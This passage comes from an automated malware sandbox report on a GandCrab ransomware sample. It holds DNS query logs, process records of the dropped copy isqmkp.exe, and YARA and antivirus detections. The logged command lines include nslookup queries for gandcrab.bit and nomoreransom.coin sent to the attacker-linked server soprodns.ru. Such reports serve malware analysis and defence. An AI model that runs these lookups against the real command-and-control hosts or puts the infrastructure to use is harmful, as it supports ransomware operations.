                                      Aug 31, 2022 23:59:57.745647907 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:59.852207899 CEST8.8.8.8192.168.2.30x82c8Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:59.877156019 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:59.898338079 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:59.918551922 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Aug 31, 2022 23:59:59.938997030 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:59.959988117 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:02.071805954 CEST8.8.8.8192.168.2.30xb09Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:02.100327969 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Sep 1, 2022 00:00:02.120507956 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:02.141537905 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:02.160455942 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:02.179536104 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:02.700483084 CEST8.8.8.8192.168.2.30xb09Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:03.343596935 CEST8.8.8.8192.168.2.30xa990Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:03.370637894 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Sep 1, 2022 00:00:03.390731096 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:03.410953045 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:03.430705070 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:03.450587988 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:03.829907894 CEST8.8.8.8192.168.2.30x82c8Server failure (2)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:05.091319084 CEST8.8.8.8192.168.2.30x31aName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:05.118396044 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Sep 1, 2022 00:00:05.138398886 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:05.158288956 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:05.176443100 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:05.194662094 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:07.399528980 CEST8.8.8.8192.168.2.30xd96aName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:07.432984114 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Sep 1, 2022 00:00:07.454828024 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:07.479063988 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:07.501718998 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:07.524806976 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:07.918035030 CEST8.8.8.8192.168.2.30xd96aName error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:09.840522051 CEST8.8.8.8192.168.2.30xa920Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:09.867008924 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Sep 1, 2022 00:00:09.887459040 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:09.910227060 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:09.933176994 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.coinnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:09.956068039 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.coinnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:11.285418034 CEST8.8.8.8192.168.2.30xa868Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:11.304387093 CEST8.8.8.8192.168.2.30xa920Name error (3)dns2.soprodns.runonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:11.310426950 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Sep 1, 2022 00:00:11.330421925 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:11.350558043 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                      Sep 1, 2022 00:00:11.370852947 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:11.388839006 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:1
                                      Start time:23:57:53
                                      Start date:31/08/2022
                                      Path:C:\Users\user\Desktop\gI5xZdIxUs.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\gI5xZdIxUs.exe"
                                      Imagebase:0xfc60000
                                      File size:101710 bytes
                                      MD5 hash:98A12EC721C098842FBFD7384D5A72AE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000001.00000000.272296797.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000001.00000000.272303387.000000000FC72000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      Reputation:low

                                      General

                                      Target ID:5
                                      Start time:23:58:02
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.coin dns1.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      General

                                      Target ID:7
                                      Start time:23:58:03
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Target ID:11
                                      Start time:23:58:05
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.bit dns1.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      General

                                      Target ID:13
                                      Start time:23:58:06
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Target ID:14
                                      Start time:23:58:08
                                      Start date:31/08/2022
                                      Path:C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe"
                                      Imagebase:0xf9d0000
                                      File size:101710 bytes
                                      MD5 hash:F4758788F11A0DE8D11EB4B8C515FFBD
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000E.00000000.307654244.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000E.00000000.307645700.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp, Author: Joe Security
                                      • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: Florian Roth
                                      • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: Florian Roth
                                      • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: Joe Security
                                      • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: ditekSHen
                                      • Rule: Gandcrab, Description: Gandcrab Payload, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: kevoreilly
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low

                                      General

                                      Target ID:15
                                      Start time:23:58:08
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup gandcrab.bit dns2.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      General

                                      Target ID:16
                                      Start time:23:58:13
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Target ID:17
                                      Start time:23:58:16
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.coin dns2.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      General

                                      Target ID:18
                                      Start time:23:58:16
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Target ID:20
                                      Start time:23:58:17
                                      Start date:31/08/2022
                                      Path:C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe"
                                      Imagebase:0xf9d0000
                                      File size:101710 bytes
                                      MD5 hash:F4758788F11A0DE8D11EB4B8C515FFBD
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000014.00000000.322631215.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000014.00000000.322638424.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp, Author: Joe Security

                                      General

                                      Target ID:21
                                      Start time:23:58:19
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.bit dns2.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:22
                                      Start time:23:58:19
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:23
                                      Start time:23:58:22
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup gandcrab.bit dns1.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:24
                                      Start time:23:58:23
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff68f300000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:25
                                      Start time:23:58:25
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.coin dns1.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:26
                                      Start time:23:58:26
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:27
                                      Start time:23:58:28
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.bit dns1.soprodns.ru
                                      Imagebase:0x7ff651c80000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:28
                                      Start time:23:58:31
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:30
                                      Start time:23:58:34
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup gandcrab.bit dns2.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:31
                                      Start time:23:58:34
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:33
                                      Start time:23:58:37
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.coin dns2.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:34
                                      Start time:23:58:37
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:36
                                      Start time:23:58:40
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.bit dns2.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:37
                                      Start time:23:58:41
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:39
                                      Start time:23:58:44
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup gandcrab.bit dns1.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:40
                                      Start time:23:58:45
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:41
                                      Start time:23:58:48
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.coin dns1.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:42
                                      Start time:23:58:49
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:43
                                      Start time:23:58:53
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.bit dns1.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:44
                                      Start time:23:58:53
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:45
                                      Start time:23:58:55
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup gandcrab.bit dns2.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:46
                                      Start time:23:58:56
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:47
                                      Start time:23:58:57
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.coin dns2.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:48
                                      Start time:23:58:58
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:49
                                      Start time:23:59:00
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.bit dns2.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:50
                                      Start time:23:59:00
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:51
                                      Start time:23:59:02
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup gandcrab.bit dns1.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:52
                                      Start time:23:59:02
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:53
                                      Start time:23:59:04
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.coin dns1.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:55
                                      Start time:23:59:04
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
